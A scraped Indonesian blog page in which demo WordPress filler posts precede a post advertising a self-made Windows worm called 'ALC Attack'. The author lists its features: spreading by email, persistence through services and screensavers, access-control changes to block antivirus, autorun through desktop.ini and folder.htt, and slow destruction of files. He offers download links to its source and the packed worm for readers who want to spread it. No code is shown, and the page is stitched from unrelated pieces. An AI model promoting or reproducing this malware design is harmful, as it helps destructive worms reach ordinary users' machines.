Sit amet felis. Mauris semper,

Welcome to WordPress. This is your first post. Edit or delete it, then start blogging!Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Quisque sed felis. Aliquam sit amet felis. Mauris semper, velit semper laoreet dictum, quam diam dictum urna, nec placerat elit nisl in quam. Etiam augue pede, molestie eget, ...

Category name clash

Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Quisque sed felis. Aliquam sit amet felis. Mauris semper, velit semper laoreet dictum, quam diam dictum urna, nec placerat elit nisl in quam. Etiam augue pede, molestie eget, rhoncus at, convallis ut, eros. Aliquam pharetra. Nulla in tellus eget odio sagittis blandit. ...

Test with enclosures

Here's an mp3 file that was uploaded as an attachment: Juan Manuel Fangio by Yue And here's a link to an external mp3 file: Acclimate by General Fuzz Both are CC licensed. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Quisque sed felis. Aliquam sit amet felis. Mauris semper, velit semper laoreet dictum, ...

Block quotes

Some block quote tests: Here's a one line quote. This part isn't quoted. Here's a much longer quote: Lorem ipsum dolor sit amet, consectetuer adipiscing elit. In dapibus. In pretium pede. Donec molestie facilisis ante. Ut a turpis ut ipsum pellentesque tincidunt. Morbi blandit sapien in mauris. Nulla lectus lorem, varius aliquet, ...

Contributor post, approved

I'm just a lowly contributor. My posts must be approved by the editor.Mauris semper, velit semper laoreet dictum, quam diam dictum urna, nec placerat elit nisl in quam. Etiam augue pede, molestie eget, rhoncus at, convallis ut, eros. Aliquam pharetra. Nulla in tellus eget odio sagittis blandit. Maecenas at ...

Posted by living.post - - 0 komentar

ALC Attack Worm Mengerikan mulai dipublikasikan untuk megalahkan Antivirus Indonesia (Worm by Admin TheRealLivingDeal)


oke, kali ini saya memberikan sebuah worm terbaru buatan saya, worm ini aku namakan ALC Attack. kemampuan ALC Attack mengadopsi kemampuan varian worm Brontok yang pernah meneror semua antivirus indonesia tahun 2006-an. disini saya menghadirkan worm ALC Attack yang mempunyai kemampuan lebih dari CSC Attack yang pernah saya utarakan pada post dulu (untuk lengkapnya, silahkan anda lihat artikel tentang CSC Attack). berbeda dengan pendahulunya (CSC Attack) worm saya kali ini lebih memberikan sebuah kejutan terbaru bagi para Antivirus Indonesia untuk segera menyerah, karena worm saya kali ini memberikan sebuah kejutan berupa Screen Saver Perusak untuk WIndows.

saya peringatkan untuk anda, worm saya ini merupakan Worm Internasional, bukan Worm Lokal

untuk selengkapnya, lihat di bawah

bicara tentang ALC Attack, anda ingat tentang CSC attack yang pernah saya postkan dahulu? nama ALC Attack berasalan dari singkatan kata tersebut, yaitu Acces Control List, dimana worm saya kali ini mengatur hak dari ACL tersebut yang ada pada windows.kemampuan CSC (Critical System Process) Attack akan saya hadirkan pula di worm baru saya di ALC Attack, Jadi anda tidak perlu susah-susah untuk membuat lagi Code Anti Worm anda yang baru, anda harus memberikan kemampuan code anda tapi mungkin pembuatanya agak sulit daripada yang pernah saya bayangkan sendiri.

daripada repot-repot baca artikel saya yang aneh ini, dibawah adalah kemampuan ALC Attack yang mulai diteliti oleh SmadAv kemarin. (saya mendapat kemampuannya setelah mendengar informasi bahwa SmadAv belum bisa melawan Worm yang saya buat kemarin)

  1. mampu mengerimkan email dengan menggunakan SMPT
  2. mampu mengimplementasikan teknik launcher menggunakan Screen SAver
  3. mampu mengimplementasikan teknik fitur service pada windows
  4. mampu mengatur hak ACL (Acces Control List) sehingga mampu melindungi folder atau file dari sentuhan user ataupun antivirus Indonesia
  5. mampu membuat salinan worm menjadi file archife .cab,.zip,.rar, dan lain-lain.
  6. mampu membuat salinan dile runtime msvbvm60.dll dengan nama yang berbeda
  7. worm ALC Attack akan melakukan eksploitasi dekstop.ini dan folder.htt yang dikenal dengan Hyper Text Template sehingga worm akan otomatis berjalan saat user membuka folder yang sudah terinfeksi.
  8. merusak file-file secara perlahan
  9. worm bila terdeteksi oleh Bitdefender adalah sebuah worm bertype virus Trojan Horse nomer 3 di salah satu database antivirus Bitdefender, dimana worm ini menduduki peringkat worm kelima di database antivirus Bitdefender (update Bitdefender 11 juli 2011)

karena saya baik hati, saya memberikan source code worm saya untuk anda bila anda ingin sekali menghancurkan worm aneh saya ini. karena itulah cobalah hancurkan worm saya ini agar antivirus anda bisa bersaing dengan antivirus interlokal, dengan memberikan source codenya, anda bisa membuat antiwormnya dengan mudah tanpa anda perlu susah-susah menyelidiki source code worm saya ini. saya ingatkan bahwa worm saya ini bukan worm lokal, worm ini merupakan worm Interlokal atau worm Internasional yang sangat ditakuti (informasi dari AVG antivirus dan Aviran Antivirus update 11 juli 2011)
untuk downloadnya silahkan klik link dibawah
Source Code Worm ALC Attack.
untuk anda yang ingin menyebarkan worm ini atau menguji antivirus lokal anda saya sudah memberikan type wormnya, dan jangan khawatir bahwa saya memenjarakn worm ini di winrar. jadi cukup anda extract saja ya!!!
download File Worm ALC Attck

Leave a Reply

Recent Posts